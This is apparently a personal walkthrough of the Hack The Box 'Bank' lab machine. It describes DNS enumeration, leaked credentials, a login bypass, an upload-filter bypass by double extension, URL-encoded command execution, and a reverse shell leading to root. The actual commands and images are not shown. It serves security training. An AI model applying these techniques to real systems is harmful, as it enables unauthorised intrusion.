🏦Bank
https://app.hackthebox.com/machines/Bank
The web server is a default Apache page, so the entry point is probably DNS ->
for better enumeration, i put a bank.htb binded to the IP in my etc/hosts folder
funny enough, if i nmap bank.htb i find a login.php in the header ?
after a quick directory brute force we find this subpage:
Now let's use the lynx tool:
Lynx is a lightweight, text-based web browser commonly used in Kali Linux for anonymity, simplicity, command-line interface, and web application testing. It is particularly useful for penetration testers and security researchers due to its ability to browse the web without JavaScript, cookies, or other features that can be used to track users, and its ease of integration into automated testing workflows.
first thing to look at is the size of the files, they are all similar
Except one who is clearly off ->
and with those creds we are able to bypass the login page:
After looking around the only possible path is the support button with an upload form:
To test out the upload form, let's use the following
Obviously:
as a soc analyst, the first level bypass of this is to use double extension ->
and that is game ->
when i try and find the file, I can't display it for obvious reasons:
Let's try to bypass this by curling it:
i changed the file extension to htb, idk why my extension did not work for the RCE, now let's abuse this
i url encoded the command to bypass anything related to spaces ->
set up my listener and run it
Now let's go for root ->
before that, let's upgrade to a better shell:
and after a bit of enumeration ->
we find a auto root script, could've found it with word spotting or stuff like that:
Last updated
